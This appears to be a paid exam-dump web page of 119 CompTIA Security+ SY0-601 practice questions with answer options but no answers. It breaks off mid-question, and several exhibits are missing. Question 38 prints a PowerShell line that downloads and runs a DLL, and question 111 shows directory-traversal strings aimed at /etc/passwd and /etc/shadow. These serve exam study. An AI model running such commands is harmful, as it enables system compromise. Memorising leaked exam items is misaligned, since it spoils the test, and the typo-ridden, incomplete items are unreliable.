Labour Day Special Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: dumps65

CompTIA SY0-601 Dumps

Page: 1 / 61
Total 607 questions

CompTIA Security+ Exam 2023 Questions and Answers

Question 1

An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox. Which of the following would be the best way for the security administrator to address this type of alert in the future?

Options:

A.

Utilize a SOAR playbook to remove the phishing message.

B.

Manually remove the phishing emails when alerts arrive.

C.

Delay all emails until the retroactive alerts are received.

D.

Ingest the alerts into a SIEM to correlate with delivered messages.

Question 2

Given the following snippet of Python code:

asWhich of the following types of malware MOST likely contains this snippet?

Options:

A.

Logic bomb

B.

Keylogger

C.

Backdoor

D.

Ransomware

Question 3

An organization wants to quickly assess how effectively the IT team hardened new laptops Which of the following would be the best solution to perform this assessment?

Options:

A.

Install a SIEM tool and properly configure it to read the OS configuration files.

B.

Load current baselines into the existing vulnerability scanner.

C.

Maintain a risk register with each security control marked as compliant or non-compliant.

D.

Manually review the secure configuration guide checklists.

Question 4

Which of the following can be used by an authentication application to validate a user's credentials without the need to store the actual sensitive data? 

Options:

A.

Salt string

B.

Private Key

C.

Password hash

D.

Cipher stream

Question 5

The application development team is in the final stages of developing a new healthcare application. The team has requested copies of current PHI records to perform the final testing.

Which of the following would be the best way to safeguard this information without impeding the testing process?

Options:

A.

Implementing a content filter

B.

Anonymizing the data

C.

Deploying DLP tools

D.

Installing a FIM on the application server

Question 6

A security architect is designing the new outbound internet for a small company. The company would like all 50 users to share the same single Internet connection. In addition, users will not be permitted to use social media sites or external email services while at work. Which of the following should be included in this design to satisfy these requirements? (Select TWO).

Options:

A.

DLP

B.

MAC filtering

C.

NAT

D.

VPN

E.

Content filler

F.

WAF

Question 7

An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced due to loss, damage, or theft steadily increased by 10%. Which of the following would best describe the estimated number of devices to be replaced next year?

Options:

A.

SLA

B.

ARO

C.

RPO

D.

SLE

Question 8

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Options:

A.

DLP

B.

TLS

C.

AV

D.

IDS

Question 9

An organization needs to implement more stringent controls over administrator/root credentials and service accounts. Requirements for the project include:

* Check-in/checkout of credentials

* The ability to use but not know the password

* Automated password changes

* Logging of access to credentials

Which of the following solutions would meet the requirements?

Options:

A.

OAuth 2.0

B.

Secure Enclave

C.

A privileged access management system

D.

An OpenID Connect authentication system

Question 10

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

Options:

A.

POP

B.

IPSec

C.

IMAP

D.

PGP

Question 11

A company policy requires third-party suppliers to self-report data breaches within a specific time frame. Which of the following third-party risk management policies is the company complying with?

Options:

A.

MOU

B.

SLA

C.

EOL

D.

NDA

Question 12

A security analyst received the following requirements for the deployment of a security camera solution:

* The cameras must be viewable by the on-site security guards.

+ The cameras must be able to communicate with the video storage server.

* The cameras must have the time synchronized automatically.

* The cameras must not be reachable directly via the internet.

* The servers for the cameras and video storage must be available for remote maintenance via the company VPN.

Which of the following should the security analyst recommend to securely meet the remote connectivity requirements?

Options:

A.

Creating firewall rules that prevent outgoing traffic from the subnet the servers and cameras reside on

B.

Deploying a jump server that is accessible via the internal network that can communicate with the servers

C.

Disabling all unused ports on the switch that the cameras are plugged into and enabling MAC filtering

D.

Implementing a WAF to allow traffic from the local NTP server to the camera server

Question 13

Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

Options:

A.

Vulnerability scanner

B.

Open-source intelligence

C.

Packet capture

D.

Threat feeds

Question 14

Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself and eventually to a caged area solely for the organization's hardware. Which of the following controls is described in this scenario?

Options:

A.

Compensating

B.

Deterrent

C.

Preventive

D.

Detective

Question 15

While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet. Which of the following controls would work best to reduce the risk of further exfiltration using this method?

Options:

A.

Data loss prevention

B.

Blocking IP traffic at the firewall

C.

Containerization

D.

File integrity monitoring

Question 16

A security administrator Installed a new web server. The administrator did this to Increase the capacity (or an application due to resource exhaustion on another server. Which o( the following algorithms should the administrator use to split the number of the connections on each server In half?

Options:

A.

Weighted response

B.

Round-robin

C.

Least connection

D.

Weighted least connection

Question 17

A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources. Which of the following should the security team do? (Refer the answer from CompTIA SY0-601 Security+ documents or guide at comptia.org)

Options:

A.

Identify rogue access points.

B.

Check for channel overlaps.

C.

Create heat maps.

D.

Implement domain hijacking.

Question 18

A security administrator needs to block a TCP connection using the corporate firewall, Because this connection is potentially a threat. the administrator not want to back an RST Which of the following actions in rule would work best?

Options:

A.

Drop

B.

Reject

C.

Log alert

D.

Permit

Question 19

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be best to help the organization's executives determine their next course of action?

Options:

A.

An incident response plan

B.

A communication plan

C.

A disaster recovery plan

D.

A business continuity plan

Question 20

A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data.

Which of the following additional controls should be put in place first?

Options:

A.

GPS tagging

B.

Remote wipe

C.

Screen lock timer

D.

SEAndroid

Question 21

Which of the following measures the average time that equipment will operate before it breaks?

Options:

A.

SLE

B.

MTBF

C.

RTO

D.

ARO

Question 22

A company would like to protect credit card information that is stored in a database from being exposed and reused. However, the current POS system does not support encryption. Which of the following would be BEST suited to secure this information?

(Give me related explanation and references from CompTIA Security+ SY0-601 documents for Correct answer option)

Options:

A.

Masking

B.

Tokenization

C.

DLP

D.

SSL/TLS

Question 23

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company’s mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:

as

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

User-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Question 24

A company needs to enhance Its ability to maintain a scalable cloud Infrastructure. The Infrastructure needs to handle the unpredictable loads on the company's web application. Which of the following

cloud concepts would BEST these requirements?

Options:

A.

SaaS

B.

VDI

C.

Containers

D.

Microservices

Question 25

A company is moving its retail website to a public cloud provider. The company wants to tokenize audit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

Options:

A.

WAF

B.

CASB

C.

VPN

D.

TLS

Question 26

Which of the following best describes when an organization Utilizes a read-to-use application from a cloud provider?

Options:

A.

IaaS

B.

SaaS

C.

PaaS

D.

XaaS

Question 27

Which of the following should a Chief Information Security Officer consider using to take advantage of industry standard guidelines?

Options:

A.

SSAE SOC 2

B.

GDPR

C.

PCI DSS

D.

NIST CSF

Question 28

An air traffic controller receives a change in flight plan for an morning aircraft over the phone. The air traffic controller compares the change to what

appears on radar and determines the information to be false. As a result, the air traffic controller is able to prevent an incident from occurring. Which of the following is this scenario an example of?

Options:

A.

Mobile hijacking

B.

Vishing

C.

Unsecure VoIP protocols

D.

SPIM attack

Question 29

A company is developing a new initiative to reduce insider threats. Which of the following should the company focus on to make the greatest impact?

Options:

A.

Social media analysis

B.

Least privilege

C.

Nondisclosure agreements

D.

Mandatory vacation

Question 30

An attacker is targeting a company. The attacker notices that the company’s employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees’ devices will also become infected. Which of the following techniques is the attacker using?

Options:

A.

Watering-hole attack

B.

Pretexting

C.

Typosquatting

D.

Impersonation

Question 31

Which of the following can be used to detect a hacker who is stealing company data over port 80?

Options:

A.

Web application scan

B.

Threat intelligence

C.

Log aggregation

D.

Packet capture

Question 32

A security practitioner is performing due diligence on a vendor that is being considered for cloud services. Which of the following should the practitioner consult for the best insight into the

current security posture of the vendor?

Options:

A.

PCI DSS standards

B.

SLA contract

C.

CSF framework

D.

SOC 2 report

Question 33

Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

Options:

A.

Web metadata

B.

Bandwidth monitors

C.

System files

D.

Correlation dashboards

Question 34

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following

is most likely preventing the IT manager at the hospital from upgrading the specialized OS?

Options:

A.

The time needed for the MRI vendor to upgrade the system would negatively impact patients.

B.

The MRI vendor does not support newer versions of the OS.

C.

Changing the OS breaches a support SLA with the MRI vendor.

D.

The IT team does not have the budget required to upgrade the MRI scanner.

Question 35

After installing a patch On a security appliance. an organization realized a massive data exfiltration occurred. Which Of the following describes the incident?

Options:

A.

Supply chain attack

B.

Ransomware attack

C.

Cryptographic attack

D.

Password attack

Question 36

An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sales systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load. Which of the following are the best options to accomplish this objective? (Select two.)

Options:

A.

Load balancing

B.

Incremental backups

C.

UPS

D.

RAID

E.

Dual power supply

F.

VLAN

Question 37

An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained Which of the following roles would MOST likely include these responsibilities?

Options:

A.

Data protection officer

B.

Data owner

C.

Backup administrator

D.

Data custodian

E.

Internal auditor

Question 38

An employee received an email with an unusual file attachment named Updates . Lnk. A security analysts reverse engineering what the fle does and finds that executes the folowing script:

C:\Windows \System32\WindowsPowerShell\vl.0\powershell.exe -URI -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Question 39

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the companVs mobile

application. After reviewing the back-end server logs, the security analyst finds the following entries

as

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

user-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Question 40

A company is enhancing the security of the wireless network and needs to ensure only employees with a valid certificate can authenticate to the network. Which of the following should the

company implement?

Options:

A.

PEAP

B.

PSK

C.

WPA3

D.

WPS

Question 41

A security analyst is reviewing packet capture data from a compromised host On the In the packet capture. analyst locates packets that contain large of text, Which Of following is most likely installed on compromised host?

Options:

A.

Keylogger

B.

Spyware

C.

Torjan

D.

Ransomware

Question 42

Unauthorized devices have been detected on the internal network. The devices’ locations were traced to Ether ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

Options:

A.

NAC

B.

DLP

C.

IDS

D.

MFA

Question 43

A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

Options:

A.

Continuous deployment

B.

Continuous integration

C.

Continuous validation

D.

Continuous monitoring

Question 44

A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which

of the following roles is the company assuming?

Options:

A.

Data owner

B.

Data processor

C.

Data steward

D.

Data collector

Question 45

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

Options:

A.

CYOD

B.

MDM

C.

COPE

D.

VDI

Question 46

The help desk has received calls from users in multiple locations who are unable to access core network services The network team has identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

Options:

A.

Disconnect all external network connections from the firewall

B.

Send response teams to the network switch locations to perform updates

C.

Turn on all the network switches by using the centralized management software

D.

Initiate the organization's incident response plan.

Question 47

Which of the following function as preventive, detective, and deterrent controls to reduce the risk of physical theft? (Select TWO).

Options:

A.

Mantraps

B.

Security guards

C.

Video surveillance

D.

Fences

E.

Bollards

F.

Antivirus

Question 48

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

Options:

A.

.pfx

B.

.csr

C.

.pvk

D.

.cer

Question 49

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

Options:

A.

HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B.

HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022

C.

HTTPS:// app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022

D.

HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00

Question 50

A company wants to modify its current backup strategy to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss. Which of the following would be the BEST backup strategy

Options:

A.

Incremental backups followed by differential backups

B.

Full backups followed by incremental backups

C.

Delta backups followed by differential backups

D.

Incremental backups followed by delta backups

E.

Full backup followed by different backups

Question 51

The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication method. The concept Includes granting logical access based on physical location and proximity. Which of the following Is the BEST solution for the pilot?

Options:

A.

Geofencing

B.

Self-sovereign identification

C.

PKl certificates

D.

SSO

Question 52

A security administrator is setting up a SIEM to help monitor for notable events across the enterprise. Which of the following control types does this BEST represent?

Options:

A.

Preventive

B.

Compensating

C.

Corrective

D.

Detective

Question 53

Which of the following BEST describes a social-engineering attack that relies on an executive at a small business visiting a fake banking website where credit card and account details are harvested?

Options:

A.

Whaling

B.

Spam

C.

Invoice scam

D.

Pharming

Question 54

A security administrator has discovered that workstations on the LAN are becoming infected with malware. The cause of the infections appears to be users receiving phishing emails that are bypassing the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs, as no internal controls currently exist in the environment to evaluate their safety. Which of the following would be BEST to implement to address the issue?

Options:

A.

Forward proxy

B.

HIDS

C.

Awareness training

D.

A jump server

E.

IPS

Question 55

A security engineer is reviewing the logs from a SAML application that is configured to use MFA, during this review the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPB, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but have been Which of the following statements BEST explains the issue?

Options:

A.

OpenID is mandatory to make the MFA requirements work

B.

An incorrect browser has been detected by the SAML application

C.

The access device has a trusted certificate installed that is overwriting the session token

D.

The user’s IP address is changing between logins, bur the application is not invalidating the token

Question 56

A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of the following solutions should the engineer implement FIRST? (Select TWO)

Options:

A.

Auto-update

B.

HTTP headers

C.

Secure cookies

D.

Third-party updates

E.

Full disk encryption

F.

Sandboxing

G.

Hardware encryption

Question 57

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

Options:

A.

Default system configuration

B.

Unsecure protocols

C.

Lack of vendor support

D.

Weak encryption

Question 58

As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a previous incident is happening again. Which of the following would allow the security analyst to alert the SOC if an event is reoccurring?

Options:

A.

Creating a playbook within the SOAR

B.

Implementing rules in the NGFW

C.

Updating the DLP hash database

D.

Publishing a new CRL with revoked certificates

Question 59

Which of the following cryptographic concepts would a security engineer utilize while implementing non-repudiation? (Select TWO)

Options:

A.

Block cipher

B.

Hashing

C.

Private key

D.

Perfect forward secrecy

E.

Salting

F.

Symmetric keys

Question 60

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to implement mitigation techniques to prevent further spread. Which of the following is the BEST course of action for the analyst to take?

Options:

A.

Apply a DLP solution.

B.

Implement network segmentation

C.

Utilize email content filtering,

D.

isolate the infected attachment.

Question 61

During a forensic investigation, a security analyst discovered that the following command was run on a compromised host:

as

Which of the following attacks occurred?

Options:

A.

Buffer overflow

B.

Pass the hash

C.

SQL injection

D.

Replay attack

Question 62

A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:

as

Which ol the following types of attacks is being attempted and how can it be mitigated?

Options:

A.

XSS. mplement a SIEM

B.

CSRF. implement an IPS

C.

Directory traversal implement a WAF

D.

SQL infection, mplement an IDS

Question 63

Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code in a software company’s final software releases? (Select TWO.)

Options:

A.

Unsecure protocols

B.

Use of penetration-testing utilities

C.

Weak passwords

D.

Included third-party libraries

E.

Vendors/supply chain

F.

Outdated anti-malware software

Question 64

An enterprise needs to keep cryptographic keys in a safe manner. Which of the following network appliances can achieve this goal?

Options:

A.

HSM

B.

CASB

C.

TPM

D.

DLP

Question 65

A large enterprise has moved all its data to the cloud behind strong authentication and encryption. A sales director recently had a

laptop stolen, and later, enterprise data was found to have been compromised from a local database. Which of the following was the

MOST likely cause?

Options:

A.

Shadow IT

B.

Credential stuffing

C.

SQL injection

D.

Man in the browser

E.

Bluejacking

Question 66

A security engineer needs to build @ solution to satisfy regulatory requirements that stale certain critical servers must be accessed using MFA However, the critical servers are older and

are unable to support the addition of MFA, Which of te following will the engineer MOST likely use to achieve this objective?

Options:

A.

A forward proxy

B.

A stateful firewall

C.

A jump server

D.

A port tap

Question 67

Which of the following in a forensic investigation should be priorities based on the order of volatility? (Select TWO).

Options:

A.

Page files

B.

Event logs

C.

RAM

D.

Cache

E.

Stored files

F.

HDD

Question 68

The spread of misinformation surrounding the outbreak of a novel virus on election day led to eligible voters choosing not to take the risk of going the polls. This is an example of:

Options:

A.

prepending.

B.

an influence campaign.

C.

a watering-hole attack.

D.

intimidation.

E.

information elicitation.

Question 69

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations.

Which of the following documents did Ann receive?

Options:

A.

An annual privacy notice

B.

A non-disclosure agreement

C.

A privileged-user agreement

D.

A memorandum of understanding

Question 70

After a phishing scam fora user's credentials, the red team was able to craft payload to deploy on a server. The attack allowed the installation of malicious software that initiates a new remote session

Which of the following types of attacks has occurred?

Options:

A.

Privilege escalation

B.

Session replay

C.

Application programming interface

D.

Directory traversal

Question 71

A global company is experiencing unauthorized logging due to credential theft and account lockouts caused by brute-force attacks. The company is considering implementing a third-party identity provider to help mitigate these attacks. Which of the following would be the BEST control for the company to require from prospective vendors?

Options:

A.

IP restrictions

B.

Multifactor authentication

C.

A banned password list

D.

A complex password policy

Question 72

The Chief information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches. Which of the following choices BEST meets the requirements?

Options:

A.

SAML

B.

TACACS+

C.

Password vaults

D.

OAuth

Question 73

The SIEM at an organization has detected suspicious traffic coming a workstation in its internal network. An analyst in the SOC the workstation and discovers malware that is associated with a botnet is installed on the device A review of the logs on the workstation reveals that the privileges of the local account were escalated to a local administrator. To which of the following groups should the analyst report this real-world event?

Options:

A.

The NOC team

B.

The vulnerability management team

C.

The CIRT

D.

The read team

Question 74

A security analyst is responding to an alert from the SIEM. The alert states that malware was discovered on a host and was not automatically deleted. Which of the following would be BEST for the analyst to perform?

Options:

A.

Add a deny-all rule to that host in the network ACL

B.

Implement a network-wide scan for other instances of the malware.

C.

Quarantine the host from other parts of the network

D.

Revoke the client's network access certificates

Question 75

A security engineer needs to create a network segment that can be used for servers thal require connections from untrusted networks. Which of the following should the engineer implement?

Options:

A.

An air gap

B.

A hot site

C.

A VUAN

D.

A screened subnet

Question 76

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

Options:

A.

Continuous monitoring

B.

Continuous deployment

C.

Continuous Validation

D.

Continuous integration

Question 77

Which of the following provides a catalog of security and privacy controls related to the United States federal information systems?

Options:

A.

GDPR

B.

PCI DSS

C.

ISO 27000

D.

NIST 800-53

Question 78

A major clothing company recently lost a large amount of proprietary information. The security officer must find a solution to ensure this never happens again.

Which of the following is the BEST technical implementation to prevent this from happening again?

Options:

A.

Configure DLP solutions

B.

Disable peer-to-peer sharing

C.

Enable role-based

D.

Mandate job rotation

E.

Implement content filters

Question 79

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Question 80

A security researcher is tracking an adversary by noting its attacks and techniques based on its capabilities, infrastructure, and victims. Which of the following is the researcher MOST likely using?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

The Cyber Kill Chain

C.

The MITRE CVE database

D.

The incident response process

Question 81

As part of a company's ongoing SOC maturation process, the company wants to implement a method to share cyberthreat intelligence data with outside security partners. Which of the following will the company MOST likely implement?

Options:

A.

TAXII

B.

TLP

C.

TTP

D.

STIX

Question 82

A Chief Information Officer receives an email stating a database will be encrypted within 24 hours unless a payment of $20,000 is credited to the account mentioned In the email. This BEST describes a scenario related to:

Options:

A.

whaling.

B.

smishing.

C.

spear phishing

D.

vishing

Question 83

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network witches. Which of the following is the security analyst MOST likely observing?

Options:

A.

SNMP traps

B.

A Telnet session

C.

An SSH connection

D.

SFTP traffic

Question 84

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

Options:

A.

Vulnerabilities with a CVSS score greater than 6.9.

B.

Critical infrastructure vulnerabilities on non-IP protocols.

C.

CVEs related to non-Microsoft systems such as printers and switches.

D.

Missing patches for third-party software on Windows workstations and servers.

Question 85

Which of the following would produce the closet experience of responding to an actual incident response scenario?

Options:

A.

Lessons learned

B.

Simulation

C.

Walk-through

D.

Tabletop

Question 86

An organization wants seamless authentication to its applications. Which of the following should the organization employ to meet this requirement?

Options:

A.

SOAP

B.

SAML

C.

SSO

D.

Kerberos

Question 87

The following are the logs of a successful attack.

as

Which of the following controls would be BEST to use to prevent such a breach in the future?

Options:

A.

Password history

B.

Account expiration

C.

Password complexity

D.

Account lockout

Question 88

A security researcher has alerted an organization that its sensitive user data was found for sale on a website. Which of the following should the organization use to inform the affected parties?

Options:

A.

An incident response plan

B.

A communications plan

C.

A business continuity plan

D.

A disaster recovery plan

Question 89

Which of the following incident response steps occurs before containment?

Options:

A.

Eradication

B.

Recovery

C.

Lessons learned

D.

Identification

Question 90

A security administrator wants to implement a program that tests a user's ability to recognize attacks over the organization's email system Which of the following would be BEST suited for this task?

Options:

A.

Social media analysis

B.

Annual information security training

C.

Gamification

D.

Phishing campaign

Question 91

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems The company follows a strict process to harden systems immediately upon delivery Even with these strict security measures in place an incident occurred from one of the workstations The root cause appears to be that the SoC was tampered with or replaced Which of the following most likely occurred?

Options:

A.

Fileless malware

B.

A downgrade attack

C.

A supply-chain attack

D.

A logic bomb

E.

Misconfigured BIOS

Question 92

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a:

Options:

A.

data controller

B.

data owner.

C.

data custodian.

D.

data processor

Question 93

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments though a single firewall?

Options:

A.

Transit gateway

B.

Cloud hot site

C.

Edge computing

D.

DNS sinkhole

Question 94

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Select two).

Options:

A.

Warm site

B.

Generator

C.

Hot site

D.

Cold site

E.

Cloud backups

F.

UPS

Question 95

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

GET 6959 &amount=500000 HTTP/1.1

GET &amount=5000000 HTTP/1.1

GET &amount=1000000 HTTP/1.1

GET &amount=500 HTTP/1.1

Which of the following types of attacks is most likely being conducted?

Options:

A.

SQLi

B.

CSRF

C.

Spear phishing

D.

API

Question 96

A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the following activities is the systems administrator conducting?

Options:

A.

Scanning

B.

Alerting

C.

Reporting

D.

Archiving

Question 97

A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be best for the security manager to implement while maintaining alerting capabilities?

Options:

A.

Segmentation

B.

Firewall allow list

C.

Containment

D.

Isolation

Question 98

An organization is having difficulty correlating events from its individual AV. EDR. DLP. SWG. WAF, MDM. HIPS, and CASB systems. Which of the following is the best way to improve the situation?

Options:

A.

Remove expensive systems that generate few alerts.

B.

Modify the systems to alert only on critical issues.

C.

Utilize a SIEM to centralize logs and dashboards.

D.

Implement a new syslog/NetFlow appliance.

Question 99

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would most likely have prevented this breach?

Options:

A.

A firewall

B.

A device pin

C.

A USB data blocker

D.

Biometrics

Question 100

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO most likely use?

Options:

A.

An external security assessment

B.

A bug bounty program

C.

A tabletop exercise

D.

A red-team engagement

Question 101

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following lost describes the type of assessment taking place?

Options:

A.

Input validation

B.

Dynamic code analysis

C.

Fuzzing

D.

Manual code review

Question 102

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

Options:

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Question 103

Which of the following agreements defines response time, escalation points, and performance metrics?

Options:

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Question 104

A security analyst is investigating a malware incident at a company The malware is accessing a command-and-control website at . All outbound internet traffic is logged to a syslog server and stored in /logfiles/messages Which of the following commands would be best for the analyst to use on the syslog server to search for recent traffic to the command-and-control website?

Options:

A.

head -500 www. compt ia.com | grep /logfiles/messages

B.

cat /logfiles/messages I tail -500 www.comptia.com

C.

tail -500 /logfiles/messages I grep www.cornptia.com

D.

grep -500 /logfiles/messages I cat www.comptia.cctn

Question 105

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Question 106

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

Options:

A.

Data custodian

B.

Data controller

C.

Data protection officer

D.

Data processor

Question 107

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works best until a proper fix is released?

Options:

A.

Detective

B.

Compensating

C.

Deterrent

D.

Corrective

Question 108

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that

some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer believes the company

can implement some basic controls to mitigate the majority of the risk. Which of the following would be best to mitigate the CEO's concerns? (Select two).

Options:

A.

Geolocation

B.

Time-of-day restrictions

C.

Certificates

D.

Tokens

E.

Geotagging

F.

Role-based access controls

Question 109

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Question 110

A security analyst is creating baselines for the server team to follow when hardening new devices for deployment. Which of the following best describes what the analyst is creating?

Options:

A.

Change management procedure

B.

Information security policy

C.

Cybersecurity framework

D.

Secure configuration guide

Question 111

A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:

php? f=/etc/passwd

.42F..42F.. $2Fetct2Fshadow

http: //company.com/../../../ ../etc/passwd

Which of the following best describes the type of attack?

Options:

A.

SQLi

B.

CSRF

C.

API attacks

D.

Directory traversal

Question 112

A security analyst receives a SIEM alert that someone logged in to the app admin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:

as

Which of the following can the security analyst conclude?

Options:

A.

A replay attack is being conducted against the application.

B.

An injection attack is being conducted against a user authentication system.

C.

A service account password may have been changed, resulting in continuous failed logins within the application.

D.

A credentialed vulnerability scanner attack is testing several CVEs against the application.

Question 113

An attacker is attempting to harvest user credentials on a client's website. A security analyst notices multiple attempts of random usernames and passwords. When the analyst types in a random username and password, the logon screen displays the following message:

The username you entered does not exist.

Which of the following should the analyst recommend be enabled?

Options:

A.

Input validation

B.

Obfuscation

C.

Error handling

D.

Username lockout

Question 114

Which of the following is an administrative control that would be most effective to reduce the occurrence of malware execution?

Options:

A.

Security awareness training

B.

Frequency of NIDS updates

C.

Change control procedures

D.

EDR reporting cycle

Question 115

An organization wants to ensure that proprietary information is not inadvertently exposed during facility tours. Which of the following would the organization implement to mitigate this risk?

Options:

A.

Clean desk policy

B.

Background checks

C.

Non-disclosure agreements

D.

Social media analysis

Question 116

Server administrators want to configure a cloud solution so that computing memory and processor usage are maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

Options:

A.

Dynamic resource allocation

B.

High availability

C.

Segmentation

D.

Container security

Question 117

A security architect at a large, multinational organization is concerned about the complexities and overhead of managing multiple encryption keys securely in a multicioud provider

environment. The security architect is looking for a solution with reduced latency to allow the incorporation of the organization's existing keys and to maintain consistent, centralized control

and management regardless of the data location. Which of the following would best meet the architect's objectives?

Options:

A.

Trusted Platform Module

B.

laaS

C.

HSMaas

D.

PaaS

Question 118

A user's login credentials were recently compromised During the investigation, the security analyst determined the user input credentials into a pop-up window when prompted to confirm the username and password However the trusted website does not use a pop-up for entering user colonials Which of the following attacks occurred?

Options:

A.

Cross-site scripting

B.

SOL injection

C.

DNS poisoning

D.

Certificate forgery

Question 119

Which of the following scenarios best describes a risk reduction technique?

Options:

A.

